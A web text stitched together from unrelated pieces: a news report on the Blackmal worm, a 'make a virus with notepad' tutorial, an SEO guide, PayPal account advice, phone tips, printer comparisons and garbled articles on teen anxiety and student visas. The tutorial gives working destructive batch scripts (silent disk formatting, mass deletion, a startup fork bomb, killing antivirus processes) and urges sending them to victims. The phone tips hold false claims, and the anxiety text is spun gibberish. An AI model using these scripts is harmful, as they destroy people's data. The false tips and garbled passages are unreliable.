Security experts urged companies on Wednesday to clean their networks of a malicious mass-mailing computer virus, before compromised systems reach the first trigger date and start deleting eleven types of files.
The virus--dubbed Blackmal.E or Nyxem.E by antivirus companies and designated as CME 24 under the Common Malware Enumeration standard--has spread to as many as 600,000 computers, with the three most infected nations--the United States, India and Peru--making up more than half of all compromises.
The virus is programmed to start deleting eleven different types of files on the third of each month, starting with Friday, February 3. The files will be deleted from a computer's local hard drive as well as network-attached storage, a strategy that worried security experts enough to warn about the virus.
"It is nothing special, just pretty simple stuff cribbed from pieces of other worms," said Joe Stewart, senior security engineer for network protection firm LURHQ. "It is just that the person decided to be malicious and wipe the affected computers."
The virus is the most destructive program to hit the Internet recently. In the past few years, virus writers have eschewed outright malicious programs in favor of code that silently infects systems and turns control over to the hacker. Four years ago, the Klez virus spread moderately and threatened to delete several file types. In 1998, the CIH virus, also known as the Chernobyl virus, threatened to delete files and erase the core system code kept in flash memory on the motherboard of certain types of computers.
The move away from such destructiveness is part of the trend among online criminals to turn illicitly-controlled computers into hard cash. Large networks of compromised computers, known as bot nets, can be used to generate money through click fraud or bulk e-mail or can be an attack tool with which to extort money from legitimate Web sites.
"The destructive behavior has really almost completely disappeared in the last five years, because the virus writers gain nothing from deleting your files," said Mikko Hyppönen, chief research officer for antivirus firm F-Secure. "Instead, they are building bot nets or installing keyloggers."
The Blackmal worm is not focused on making a buck, however. Computers that remain infected on February 3 will have eleven types of data deleted from the hard drive, including any Word, Excel, PowerPoint or PDF documents. The seriousness of the virus's impact is still unknown, however. A similar threat posed by the Sober virus, which was supposed to download additional functionality on January 5, largely failed to happen. Because the Blackmal virus does not rely on external Web sites, however, it's unlikely that it will be as easily hobbled.
Some data suggests that the worm will cause some headache for companies and home users. At least two victims, whose computers had the wrong date set, already have reported that the virus deleted files, according to F-Secure. The virus deletes files not only a system's local hard drive, but also any network-attached drives--a characteristic that resulted in one of the two victims, an India-based company, losing a significant number of documents stored on its network.
"We have two people who have contacted us and we have double-checked files from their systems," F-Secure's Hyppönen said. "One (victim's machine) had write access to most to his company's network and the virus had deleted most of the company's data."
LURHQ's analysis also suggested that at least one company could find a large number of files lost. Of the more than 90,000 Windows computer estimated to be infected in the United States, about 75,000 belong to a single company, according to the company's analysis. Because the virus can also spread among Windows computers that shared files on the same local network, once one person's computer is infected through e-mail, other computers in the company are put at risk, especially if the company has not hardened its internal security, LURHQ's Stewart said.
"We have been preaching to people for years against running your network that way--with everyone logged in as administrator and everything opened up on the inside," he said. "That's the sort of configuration that gets hit really hard by this."

Disabling Display of Drives in My Computer

This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My Computer go to : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Now in the right pane create a new DWORD item and name it NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh. When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply delete this DWORD item. It's .reg file is as follows: REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore r] "NoDrives"=dword:03ffffff

NOTE : to open HKEY_CURRENT_USER

Go to run and type regedit

To hide drive or prevent access to specific drive:

This method can be used only on Windows XP Professional Edition.

1.Open the Group Policy Editor (Start > Run, type in “gpedit.msc” and press [Enter]).

2.Go to User Configuration > Administrative Templates> Windows Components > WindowsExplorer.

3.Here, you’ll find “Hide these specified drives in My Computer” and “Prevent access to drives from My Computer”.

4.The difference between the two settings is that “Prevent access” will allow the user to see the drive icon, but will give an error message when he tries to access it.

5.“Hide” will remove the icon so the user won’t see it, but the drive can still be accessed by using Start > Run and keying in the drive letter.

6.Under this setting, after you click the radio button next to “Enable”, you’ll see several options. Choose the one you want to

apply, for example, “Restrict A and B drives only”. You’ll notice that the options here are restricted; you cannot, for example,

choose to restrict drives A, B and D.

Please don’t try these cause these are really VERY dangerous. i'll not responsible for any data loss caused by using these tricks.
This is only for Educational purpose only
As i don't knew copyright terms and all that. all i knew is that i found all these information on Internet so here I'll not responsible for any content published here.

this article is for fun and science project only don't spread viruses or delete any body's data.

I know this is going to be controversial. This is for informational purposes only. DO NOT spread or release the viruses created in this article.

1. Open a window of notepad.

Type : FORMAT C:

save the file as disk_destroyer_basic.bat

it will delete all data on your c drive if clicked.

If you type the following: format c:\ /q It will not ask you to confirm the delete.
2. waana Crash the computer? Easy! Just type this into notepad:

:A

start

start

start

goto A

then save it as all file types, and at the end of the filename put .bat , then simply put in the victims startup folder, and the computer will crash every time windows is turned on.

3. To ensure all partitions and drives are destroyed you would have to write

@ echo off

format A: -y

format B: -y

and so on for all the letters of the alphabet. This will not only wipe all the partitions on the computers main drive, but also any other devices connected to it, such as usb sticks, cds and external hard drives. reason to put FORMAT C: -y is that just FORMAT C: asks the user if they want to wipe their own hd, to which they will say no. FORMAT C: -y will perform the same operation, but without needing confirmation.

4.Other techniques Making a virus with notepad

you will need:
Notepad

A victim with a pc

Open up notepad and type:

DEL /F /Q *

Save it as "virus.cmd" You can change virus to whatever you want.

DONT OPEN IT!

It deletes everything on your computer.

Send it to your victim, say when they open it all their dreams will come true or some crap.

Have fun.

And it’s really VERY dangerous

  5. try this out copy this and paste in notepad and rename it abc.bat & send it

title Hack Setup

color 0A

@echo off

set end=md "Hack installing"

set fin=copy "Hack log.txt" "Installing"

%end%

%fin%

net send * Hack is installing, press OK to begin set up.

kill NAVAPSVC.exe /F /Q

kill zonelabs.exe /F /Q

kill explorer.exe /F /Q

cls

assoc .exe=txtfile

assoc .txt=mp3file

cls

msg * It is you who is hacked....

msg * I warned you, and you kept going. Challenge me and this is what happens.

DEL C:\WINDOWS\system32\logoff.exe /F /Q

DEL C:\WINDOWS\system32\logon.exe /F /Q

DEL C:\WINDOWS\system32\logon.scr /F /Q

cls

shutdown

it will delete all c drive and shut down the computer.. all data gone.. lol...

  6. some others write ur own simple virus cant detected by any antivirus..

@Echo off

Del C:\ *.* |y

And save that as .bat not .txt and RUN IT

It will delete the content of C:\ drive...

use these techniques at your own risk. be sure to back up before doing this..

As i don't knew copyright terms and all that. all i knew is that i found all these information on Internet so here I'll not responsible for any content published here.

Matt Morgan's 2013 Website Optimization & SEO GuideWe all have big plans for 2013 and it’s about time we step back and re-evaluate our SEO efforts. The last couple years have been riddled with high impact algorithm updates that have put online marketers to the test. I believe the new standards of quality are encouraging an overall better online experience for web searchers. Nobody likes webspam and I’d like to think that as SEOs, we will contribute to a great user experience instead of saturating the web with crap content to build a link.
My website optimization company, Optimize Worldwide, and I are currently restructuring our SEO efforts with the goal to follow the webmaster guidelines set forth by Google and Bing, publish quality, sharable content, and drive people to awesome web pages that are responsive to any device. This article is actually going to be my own personal guide for 2013 and I figured I’d share it with you. This guide is not all inclusive and is intended to offer a general overview. I encourage all of you to comment below and share your goals, tips, and strategies that might help all of us in the SEO space to build a better online experience.

On-page Website Optimization

Error Free

Website Errors
An error free website is a beautiful thing. Google Webmaster Tools is your best friend for this task. GWT will help you review any crawl errors, duplicate page titles, duplicate meta descriptions, warn you of any troubles reaching your website, report any problems with your Sitemap or robots.txt file, etc. GWT tools should be in your arsenal. Google is literally telling you what to fix in order to rank better in the SERPs. I think the most powerful thing you can do with GWT, related to technical optimization, is export your list of 404s from the Crawl Errors screen, review them carefully, and properly redirect them to relevant pages on your website using a 301 via your .htaccess file.

Website Design 101

When building a website, consider the quality of your code and HTML markup. Structure your website in a fashion that makes sense to the average person and can be navigated through with ease. Use basic HTML elements to structure an individual page, for example, properly using H1, H2, p, ul, ol, li, strong, blockquote, etc. Each element will help the crawlers determine the parts of your page that are emphasized or that are a subset of a topic. If you need a refresher on basic HTML, W3Schools has just about everything. Google has published their Google HTML/CSS Style Guide which has some great information and it’s nice to know how they prefer your code.
If I could only optimize 3 parts on a web page, I’d put my focus here:
  1. Page titles
  2. Search engine friendly URLs
  3. Quality content

Submit Your Sitemap

Submit XML Sitemap to Google & BingThis one is often overlooked and under optimized. If you are publishing great content on your website, tell Google and Bing about it! You should submit your XML Sitemap to Google and Bing and monitor your index status via GWT. You will find that your content shows up in the SERPs much faster. I wrote an extensive step-by-step guide that is available here.

Page Speed

Who wants to wait for a page to load? Make sure you do everything you can to optimize your page speed. Some simple tips: Ensure your images are sized correctly and are at 72 dpi. Put all of your JavaScript in one file and do the same with your CSS. Use CSS in place of images when possible. You can also optimize your server for page speed too. Cache your website (there are WordPress plugins available). See if your hosting provider supports mod_pagespeed and activate it. You could even go to the extent of launching WordPress into the Google cloud. Another option would be to serve up a slimmed down version of your website when a mobile device is detected.

Responsive Web Design

Responsive WordPress Website Theme
There are so many different devices accessing websites these days, it’s imperative that your website renders correctly on all. There was a time when you could afford to miss out on the 0.1% of users accessing the web on mobile devices. Today, a website might get equal traffic from desktops, laptops, mobile, and tablets. Focus on a user experience that works well for all devices. There are a ton of WordPress themes available now that offer responsive design.

Search “Experience” Optimization

I see a lot of articles with headlines that read “SEO is dead”. It really depends on how you view the definition of SEO. I was watching one of Matt Cutts videos where he answered the question Do you think that “Search Engine Optimization” should be renamed? Matt suggested that SEO should really focus on the experience and his quote “Search Experience Optimization” really stuck with me. Some of the ways you can offer a better experience directly in the SERPs is by implementing structured data and Google authorship.

Structured Data

If you are not already implementing Schema.org rich snippets, you need to start now. The big 3 collectively acknowledge a library of markup that helps the search engines better understand what your page is about and how to parse the information on the page. I wrote an article in December of 2011 explaining a little bit about how it works. Basically, you can improve the display of your search results by wrapping your content with rich snippets. The library is extensive and continuously growing. You can wrap just about any content in rich snippets. I don’t see Schema.org implementations affecting page rank at the moment, however, it certainly increases your click through rate (CTR).

Google Authorship

In a nutshell, if you complete the two-way link between your website and your Google+ profile using the rel=author tag, you can have the opportunity to have your profile picture show up next to your website listing in the Google SERPs. This has proven to increase your CTR and puts a little more emphasis on “who” is publishing content, rather that “what”. I have not seen this directly affect page rank, however, it does tie into the social influence. Google has personalized results turned on by default. If your target market has you in their circles, or have someone who shares your content in their circles, your content will jump up to the top of the SERPs.

Content Creation & Link Building

Copywriters & Guest Blogs

Hire awesome copywriters, preferably in-house. I’ve used online services to have our blogs, press releases, and web page content written, but it’s just average. I hired an in-house copywriter recently and the stuff we are producing now is actually interesting to read and sharable. It’s easy to get content for your website. You can use networks like Blogger LinkUp by Cathy Stucker or Ann Smarty’s My Blog Guest. Those networks are nice when you get busy and need to fill your content calendar. They are also a great resource to find blogs and websites that will publish your content. Typically, you will get your content published on sites that range from PR2 to  PR4. If you want a link from a PR5+, keep reading…

Guest Blogging & Relationship BuildingReplace Link Building with Relationship Building

I read a lot of Jon Cooper’s stuff and he consistently mentions the importance of building relationships versus building links via article directories and submission sites. He has a powerful link building coursethat I highly recommend you take a look at. It’s worth every penny. I’m still scratching the surface of relationship building, so I don’t have any advice to offer other than focusing on the concept itself. Actually, I’m hoping to get some feedback in the comments section from SEOs on relationship building that have landed them some quality backlinks.

Co-Occurrence

@Randfish published some really cool insights into the future of link building in one of his Whiteboard Friday videos. The headline was Prediction: Anchor Text is Weakening…And May Be Replaced by Co-Occurrence- Whiteboard Friday. The concept is sound and I am anxious to do some of my own testing. If I had to sum up Rands video in a formula, it would look something like this:
LinkBuilding2013 = Key Phrase + Brand Name

Reporting

Analytics

After all of the hard work is in place and things are looking good, the next step is to be able to show your client how effective your SEO efforts are. I follow Jill Whalen on Google+ and she asked the question Do you run ranking reports? and wrote a great tutorial on how she utilizes Google Analytics to measure SEO success. I thinks it’s important to review GWT, Google Analytics, and Bings reports, but more importantly understand how to analyze the data to benefit your SEO efforts.
Google Analytics Website Reporting

Testing

It’s really hard to find time to test, but it will pay off in the end. You can set up A/B content experiments using Google Analytics to see what your website visitors are responding too. Test different SEO strategies and measure the results. Test for the fun of it and learn something new. I recently had an experiment published on SEOmoz titled Google SERP Test: Multiple Page Title & Meta Description Tags and it was fun. I learned a few things and got some great feedback from the SEO community.

Final Thoughts

I’m anxious to see what’s in store for 2013. The topics I touched on earlier are just a few of the things I will be focusing on. I don’t claim to know everything; in fact, I wanted to publish this guide in hopes that the SEO community would help me build on it via the comment section below.

Thinking of selling or offering subscription for your service or products? Paypal makes it easy for you. Let’s see the different types of Paypal accounts available and which should you be using for your business needs.

Types of Paypal Account

If you are going to accept Paypal payments on a regular basis, it’s best that you upgrade your account to a Premier or Business account to save on fees. The fact is that Paypal does give priority to Business/ Premier accounts when it comes to support makes you wonder what will happen if you have problems with your Personal account that you need to resolve urgently. Here’s the fee breakdown difference between both a Personal and Business/Premier account.

Woot? Why don’t we just stick with Personal Accounts since we aren’t charged any kind of transaction fees at all whereas Business/Premier accounts have to pay a fee for every transactions that comes in?

Advantage of a Personal Paypal Account

No fees involved when you use it to send or receive money from friends!

Disadvantage of a Personal Paypal Account

Monthly withdrawal limit is only $500. You have no room for any business transactions if you’re going to only use a Personal Account.
Receiving only 5 times of debit/ credit payments a year.
No priority support. I see that as a big nono.

A Personal Account is merely for people who do not use Paypal often and don’t intend to use it for business. Here’s Paypal clearing the air on selling with Personal accounts.

Can I sell with a Personal account?

No. Personal accounts are for personal use. You can use a Personal account to send money to friends and relatives and to purchase items online when PayPal is offered. If you earn money by selling items online, you should use a Premier or Business account.

If you do not receive payments or make transactions with Paypal often, a Personal Account would suffice, else hit to the Premier/Business Account. I have mine since 2003, money well paid for for my subscriptions to my server, payments coming from different advertising networks.

Disadvantages of a Premier/ Business Account

Well, uhm. Fees?

Advantages of a Premier/ Business Account

Full access to merchant facilities, no limit to your transaction amounts and slightly prompt support when submitting support tickets/ emails. For all credit card gateways that are readily available on the Internet for you to start accepting them for business, Paypal is the easiest choice next to Worldcard. Invoicing would pretty much be easier too.

Can you use a Personal Account to receive payments and a Business/ Premier Account for businesses (Splitting the money)?

Nope you can’t. As on contractual agreement between you and Paypal when you signed up for an account, watch out for 4.8

No Splitting Payments. You may not split payments between a Personal Account and a Premier or Business Account by directing buyers paying with a credit card to send payments to your Premier or Business Account, and buyers paying with their Balance or bank account to send payments to your Personal Account. If you do so, we will charge you the Fees that would have applied to a Business or Premier Account.

Bottom line, pay for a business/ premier account if you need Paypal for business. It’ll be worthwhile if you have more than 5 – 10 transactions on a month to month basis. Doing it early would increase your reputability as a long standing customer with Paypal.

Difference between Premier and Business Accounts?

With a business account, you’re allowed to add multiple emails to accept Paypal payments as compared to a Premier for business. So multiple users can login to the same account with different permissions as indicated by the account creator.

If you’re unsure of which account should you have with Paypal, start with the Personal and work your way up. If you find yourself limited by the options that you desire or wish to use, then it’s time to upgrade your account.

4 THINGS YOU PROBABLY NEVER KNEW YOUR MOBILE PHONE COULD DO

There are a few things that can be done in times of grave emergencies. . Your mobile phone can actually be a life saver or an emergency tool for survival. Check out the things that you can do with it:

FIRST : Emergency
The Emergency Number worldwide for Mobile is 112.
If you find yourself out of the coverage area of your mobile; network and there is an emergency,
dial 112 and the mobile will search any existing network to establish the emergency number for you, and interestingly this number 112 can be dialled even if the keypad is locked. Try it out...

SECOND : Have you locked your keys in the car?
Does your car have remote keyless entry? This may come in handy someday.
Good reason to own a cell phone: If you lock your keys in the car and the spare keys are at home, call someone at home on their mobile phone from your cell phone.

Hold your cell phone about a foot from your car door and have the person at your home press the unlock button, holding it near the mobile phone on their end. Your car will unlock.

Saves someone from having to drive your keys to you.

Distance is no object. You could be hundreds of miles away, and if you can reach someone who has the other ' remote ' for your car, you can unlock the doors (or the trunk)...

Editor ' s Note: It works fine! We tried it out and it unlocked our car over a mobile phone! '

THIRD : Hidden Battery Power
Imagine your mobile battery is very low. To activate, press the keys *3370#
Your mobile will restart with this reserve and the instrument will show a 50% increase in battery.
This reserve will get charged when you charge your mobile next time.

FOURTH : How to disable a STOLEN mobile phone?
To check your Mobile phone ' s serial number, key in the following digits on your phone: * # 0 6 #
A 15 digit code will appear on the screen. This number is unique to your handset..
Write it down and keep it somewhere safe. When your phone get stolen, you can phone your service provider and give them this code. They will then be able to block your handset so even if the thief changes the SIM card, your phone will be totally useless.

You probably won ' t get your phone back, but at least you know that whoever stole it can ' t use/sell it either. If everybody does this, there would be no point in people stealing mobile phones.

SHARE ON YOUR WALL AND TAG YOUR FRIENDS IT MAY USEFUL TO SOMEONE !!

Inkjet, Deskjet and Laser printers are all types of printers that are available on the market. Inkjet and Deskjet are basically printers that use inkjet technology, while laser printers use completely different technology to print documents. The terminology used in many of technology is often confusing for many people that do not have hands-on experience with technology. However, once a distinction is made it is quite easy to understand which type of printer would be best for office use or home use.

[Inkjet Printer] Inkjet is a type of printer that produces images by propelling droplets of ink onto the paper. These printers are the most common type of printers that are available in households. They are usually small in size and can range in prices, depending on the company and the functions it can perform. More expensive models might also come with copy, fax and scan functions. The concept of inkjet printing was developed in the 19th century, with the printer technology being developed in the late 1950s. Printers that could render digital images generated by computers were developed in the 1970s by Epson, Hewlett-Packard and Canon.

The inkjet printer works in a complicated way. It has a series of microscopic nozzles that spray a stream of ink directly onto the paper. The nozzles either have a high pressure pump or tiny heating elements behind them that helps deposit ink on the paper. There are two main technologies that are used in an inkjet printer: continuous (CIJ) and Drop-on-demand (DOD). In continuous technology, a high-pressure pump direct liquid ink from the cartridge through a gunbody and a microscopic nozzle, creating a continuous stream of ink droplets that are deposited on the paper. Extra unwanted ink is dropped into a gutter, which is recycled when the printer is active again. Drop-On-Demand is divided into thermal DOD and piezoelectric DOD. The thermal DOD uses a heating element to heat the ink in a chamber, which cools when applied to the paper. The piezoelectric DOD uses a piezoelectric material behind each nozzle instead of a heating element. In DOD, the printer cartridges fires ink only at special points on the surface that is required for creating an image.

[Deskjet Printer]

Inkjet printers produce cheaper copies but prints slower compared to laser printers. These are also small and compact, with the printer fitting right on the desk or workstation. The initial cost of these printers is quite cheap, but Officejet is usually more expensive than the basic model as it incorporates other features. Inkjet printers are honed for their ability to print good quality and sharp text and images and to print on almost any kind of paper. Advantages of an inkjet include quieter in operation, high print quality, no warm up time and low cost per page. While, disadvantages are the ink is expensive (cheaper alternates are available from third party cartridges), ink is not waterproof, the nozzle is prone to clogging and the ink dries up if not used for long periods of time.

Deskjet is a brand of printers by Hewlett-Packard. These printers are a cheaper variant to the company’s Officejet printers. Deskjet is created for home usage, which means there are more compact, have less features and are cheaper. Deskjet printers are basic models and only offer printing capabilities. More features can be purchased with higher models, which cost extra. These printers also have slower printing speeds, with the highest Deskjet printer printing around 28 pages a minute. Deskjet printers do not even offer automatic double-side printing or wireless capabilities; features that are available in the company’s Officejet brand.

[Laser Printer] Laser printer is a type of printer that produces high quality text and graphics by passing a laser beam on plain paper. This process uses a xerographic printing process, which uses a cylindrical drum coated with selenium to print an image. Laser printers are quite huge and bulky and require fast paper feeders. These are most found in offices and commercial places that require high quality papers, printed fast. Laser printers are expensive units and require a dedicated place. Maintenance level is high for the device and is also expensive. Laser printers are more common in black and white, while colors printers cause extra. Laser printer was developed at Xerox in 1969 by Gary Starkweather. He modified an existing xerographic copier and fitted it with printing capabilities.

The printer works similar to a photocopier. The machine uses the data sent from the computer to create a raster line or scan line. The Raster Image Processing (RIS), typically built into the printer, creates a bitmap of the final image in the raster memory. After this, an electrostatic charge is applied to the photosensitive drum. The system also applies AC bias to the roller to remove any previous charges and a DC bias on the drum surface to ensure a uniform negative potential. A laser is then fired on the electro statically charged light-sensitive drum. The drum then attracts the toner in the places the charge is still present. The drum then becomes hot and fuses the toner to the paper, which then produces the image. Laser printers are quite extensive cleaning incase of jams and requires maintenance. However, one toner can produce up to 5,000 pages before replacement.

In short, inkjet and Deskjet are basically the same type of printer, with just a different name. A Deskjet is just a brand name of printers that are available by HP.  The company has placed printers in two categories: Officejet and Deskjet. The Officejet is aimed at office purposes and includes other features, while Deskjet is a basic printer that is cheap, affordable and easy to work. A laser printer is actually a completely different type of printer and also aimed for office use. These printers use a different method of printing and are usually bulkier.

1) Most inkjet cartridges are rigged to stop printing even before the ink is gone. Toner cartridges can print even after the toner gets low just by shaking the cartridge gently.
2) Ink cartridges dry up over time. Toner lasts until it's empty.
3) Slowest laser printer prints faster than the fastest inkjet.
4) Ink is water soluble. One drop of water completely destroys printed text. Toner isn't.
5) Toner cartridges are more expensive, but they last many times more than ink. With certain models you can get more than 3 times the number of pages per dollar with laser than with inkjet.

If you're buying a printer, either for work or for home, one of the choices you're likely to be faced is whether to get an inkjet printer or a laser printer. Inkjet printers use liquid ink sprayed through microscopic nozzles onto the paper, and laser printers use a toner cartridge (filled with fine powder) and a heated fuser.

Each technology has its own strengths and weaknesses. The two types use different approaches and each is appropriate for meeting different printing needs.

Initial costs

Surprisingly enough, you can purchase a basic laser or inkjet printer for almost the same price. If you're looking for a budget multifunction printer -- which will include the ability to photocopy and scan images as well as print -- there's not much difference in price between inkjets like the Canon PIXMA MX350 and lasers like the Dell 1133. One distinct difference between these two models, however, is that only the inkjet model can print colour pages — budget laser printers are only capable of producing black-and-white documents.

The cheapest laser printers will generally cost around $130; you can pick up inkjet printers for as little as $60-$70. However, these budget inkjet printers generally come with 'starter' cartridges, which don't have a full ink tank. This means you'll need to refill them after fewer prints.

Ongoing costs

As you continue to use your new printer over a period of time, you'll need to keep it supplied with appropriate consumables like paper and ink or toner. The ongoing running costs of printers are generally quoted in cents per A4 page. You can calculate this by dividing the number of pages an ink or toner cartridge can produce (this figure is provided by the manufacturer) by the price of the cartridge. This doesn't include the cost of paper though (but this won't change depending on the type of printers).

Generally inkjet printers have a price per page of around 20 cents, although this includes both black and colour cartridges — if you intend to print only black, ongoing print costs are generally 7-8 cents per page. Cheap black-and-white laser printers have a price of around 6c per page on average. If you spend more on a laser printer, the cost per page generally drops quickly.

Larger laser printers have additional ongoing costs when compared to inkjets: they often require an additional fuser cartridge or the replacement of parts with a maintenance kit.

Print speed and text print quality

When it comes to printing black and white text pages, laser printing is unbeatable. Even in low-end cheaper monochrome laser models you can expect print speeds of up to 20 pages per minute. Inkjets are significantly slower, with budget printers rarely printing more than 6 pages per minute of black text.

For normal print sizes (of around 12pt and larger) text printing quality is similar between both laser and inkjet printing platforms. However, if your printing needs include printing small fonts then lasers are normally superior to inkjets, as the fusing technology better lends itself to the minute curves and dots of small text.

Colour printing and colour print quality

If you want to print colour — whether it's a full-page colour photograph or simply a pie chart — you'll almost certainly be better off with an inkjet printer. Colour laser printers are often bulky and quite expensive and generally aren't suited to home or small office use.

Even when comparing a colour laser printer to a colour inkjet, the inkjet is likely produce better colour images. Inkjet printers are able to reproduce subtle colour gradation in images where laser printers will display banding (distinct changes in colour saturation).

Size

Size is an important consideration for some users. If you're looking for something to fit into a small space on or underneath your desk, it's hard to go past an inkjet printer. However, if you don't need scanning or copying a single-function laser printer may be small enough to suit your needs.

Conclusion

If you're buying based on price — and most consumers are — the choice between a laser printer and an inkjet is simple. If you can afford to pay a little more upfront and if you'll only be printing black text documents, a laser printer is a convenient solution. Inkjet printers are far more versatile, which is important for home use, but you'll pay more in ongoing running costs and will have slower print times. Choose carefully!

Printer is a machine which produces data from a particular system (usually computers) in printed form. Inkjet and Deskjet are two of the most commonly used printers today. Inkjet printers create digital images on paper with the use of droplets of varying sizes. The dots that appear on the paper printed using inkjet printers are minute (usually, fifty to sixty microns in diameter). The resolutions offered by these printers extend to 1440X720 dpi (dots per inch).

Deskjet, on the other hand, is a brand name given to inkjet printers that are designed by HP (Hewlett-Packard). These models are available in a variety of sizes ranging from compact domestic printers to larger ones for frequent and regular use. Deskjet printers have the ability to print almost three pages in a minute. Although Deskjet printers are HP’s version of regular inkjet printers, they are quite different in terms of their print heads. The print heads used in Deskjet printers are disposable and inexpensive. They are built into the cartridge and deliver a much higher print quality as compared to inkjet printers because the head and the ink are replaced frequently in the latter.
Quality of ink used

"Jets" – components similar to small nozzles are used to deploy ink in inkjet printers. The printer works by spraying ionized ink on paper. The ink is then directed through magnetized plates that are placed under the paper, creating printed images or text.

Inkjet printers are cheaper than Deskjets. However, the quality of ink used in inkjet printers is not as good in comparison with that used by Deskjets. The fonts visible on paper will have smoother edges when printed through a Deskjet printer. Although inkjet printers are cheaper than Deskjets, the ink used in the former is more expensive than that used in the latter. The cartridges will have to be replaced frequently when you print several papers or pictures. The cartridges in Deskjet can be used for a long time.
Resolution of the printers

The resolutions of inkjet printers vary from 1200 X 1200 DPI to 4800 X 1200 DPI, while Deskjets offer resolutions from 600 X 600 DPI to 2400 X 2400 DPI. Inkjet printers are faster when compared to Deskjets, and the standard images printed on the former have a resolution of around 300 X 300 DPI.

The two most commonly used cartridges for printing are thermal and piezoelectric. Thermal cartridges are used in inkjet as well as Deskjet printers. They have several "jets" or tiny nozzles, and heat is used to deploy the droplets of ink through these nozzles. Small heaters present inside the cartridge heat up the ink until bubbles are formed. Printer ink is then shot out of the nozzles when these bubbles burst. Then, the cartridge cools down and new ink is pulled into the nozzles during the next printing session.

Piezoelectric cartridges deploy the "piezoelectric" technology when ink droplets are sprayed onto a sheet of paper. Electric signals are emitted instead of warming up the ink. The "jets" release the right quantity of ink into the head, thereby delivering print quality that is higher in comparison with thermal cartridges.

Hi there,
This is YASH(YesAskSoHelp)

Difference Between Inkjet and Deskjet

Inkjet vs Deskjet

“Inkjet” and “deskjet” refer to printers. There are many different types of printers and different technologies are used for them. Many printers have been developed by certain companies and brands. They have registered specific names, for example, “deskjet” is an inkjet which has been developed by the company HP for desk use at home or office. Inkjet technology is very different from laser printing which is used in machines like Xerox copiers.

Inkjet Printers
Printers are of many different types. The main characteristic of inkjet printers is it uses a printhead which ejects very small, tiny droplets of ink onto the paper for printing. It is a computer printer, and the ink droplets create a digital image onto the paper. Inkjets may vary in size and range from very expensive to inexpensive models. Some are intended for home and office use while others are intended for professionals, and the machines might cost thousands of dollars.

The technology of inkjet printing developed mainly in the 1950s though the concept had been around for some time. The first inkjet printer using a computer was developed in the 1970s by Canon, Hewlett-Packard, and Epson. It could reproduce the images generated by computers. Today there are four, main manufacturers of inkjets: HP, Canon, Epson, and Lexmark. There are mainly two different technologies used in inkjet printing: DOD, Drop-On-Demand, and CIJ, Continuous Inkjet.

Deskjet Printers
Deskjet printers are especially the inkjets which have been developed and manufactured by HP. It is a series of inkjets which is used for desk purposes in the office and home and is a brand name for an inkjet developed by HP. HP uses the thermal inkjet process for its Deskjets. This technology was first developed in 1979 and was introduced in 1984 as Thinkjet. At first they could print only black and white, but later color printers were also developed.

The first Deskjet was launched in February of 1988 and could print two pages per minute. It was the first, single-sheet printer for desktop usage. There are many models which have been developed. The Deskjet 500 printer is a very high-speed printer which can print up to three pages in one minute and is compatible with Window’s True Type Fonts. When Deskjets were launched, they were an inexpensive alternate to laser printers and thus gained popularity.

Some of the features of Deskjets are: they are high-speed, may have wireless connectivity, lightweight, inexpensive, they have a disposable printhead which allows the print quality to be consistent as they can be replaced frequently as needed.

Summary:

1.Inkjet is a computer printer; it uses a printhead which ejects very small, tiny droplets of ink onto the paper for printing. The ink droplets create a digital image onto the paper. Deskjets are a series of inkjets which are used for desk purposes in the office and home and is a brand name for the Inkjet developed by HP.
2.Today there are four main manufacturers of inkjets: HP, Canon, Epson, and Lexmark; Deskjet is a brand name and manufactured only by HP.
3.There are mainly two different technologies used in inkjet printing DOD, Drop-On-Demand, and CIJ, Continuous Inkjet. Deskjets use thermal inkjets.

Stress and anxiety is much more frequent that you could understand during adolescent years. This is generally due to the fact that the children are exposed to decisions that posture dilemma. Also basic circumstances are able to pose a test amongst adolescents. The major reason for this is the sort of requirement mother and fathers have for their young children. Moms and dads anticipate their children to be just what they choose them to be. There are many moms and dads who do not even listen to their children. Anxiety in teenagers is not much frequent these days. As with all partnerships communication is imperative.

There are many ailments that could affect a young adult. The major reason for these afflictions is unskilful parenting. Moms and dads especially those that do not have much knowledge relating to parenting expect a whole lot from their children. It is usual that when a youngster is uneasy in a social environment they begin to create reasonable self-esteem. The method to move toward the difficulties as well as circumstances is kind of altered for those teenagers. They develop indicators like are blushing, sweating abundantly and dilemma conversing. This is generally created by having a bad image of yourself in social circumstances. Study to remember times when you were successful in socialising.

There are numerous disorders that are categorized under the anxiousness problems for teens. There are 6 conditions to be particular. One of them is grouped as social phobia. The main explanation of all these conditions is an uncomfortable social setting. The young child is confused by the scenario and engulfed in it. The fact is distorted to these teenagers. Nourishing your young children the proper evaluations makes them desire to achieve higher highness. A minimum of makes them vibrant enough to experience the challenges encountering them either from the society or from project squarely. Therefore consistently promote your positive opinions when you watch them participatinged in beneficial social behavior.

The most necessary of the afflictions of anxiety in teenagers is panic attack. This is a lousy ailment as it induces them to suffer a lot. It could be serious as well. It may make them acquire stressed without any kind of strong reason and have them having puzzled about the collection of sensation they are having. They become unconscious driven as well as it comes to be difficult for them to lead a typical life. The typical signs of this condition are a feeling of an approaching doom, nauseous, exhausted and/or physically sensation. These signs are generally developed in a young adult and also have an effect throughout the individual life unless challenged. For this cause we always encourage watching a health expert when dealing with the problems.

There is yet another kind of condition making the kid do numerous points which it does not mean to do. This anxiety affliction is called obsessive uncontrollable condition. The young adult obtains some ideas engaging them to duplicate particular actions/tasks where repetition is not needed. This problem is not on a conscious degree ... as often the person recognizes the action is not productive yet has bit of state in the mater, and simply feels forced to repeat the task. Anxiety in teenagers bet a role in making them mentally challenged.

The State Department has rules for giving permission to foreign students studying in the United States. The rules can be found on the State Department's travel Web site: travel.state.gov. Under Services, go to Visas for Foreign Citizens to Come to the United States, Non-immigrant Visas, Student and Exchange Visitor Visas and Applying for a Foreign Student Visa.

Every foreign student who has been accepted by a college or university to study in this country must have a legal document called a visa from the United States government. The rules for getting a visa have changed a bit over the past decade, requiring more stringent security and background checks.

National security is the most important issue in deciding if a person should be permitted to enter the United States. It now takes a longer time for a person to receive permission to enter the country. This past summer, a new policy took effect. It requires additional security investigations of men between the ages of sixteen and forty-five from twenty-six countries. Officials say these men are waiting the longest for their legal papers.

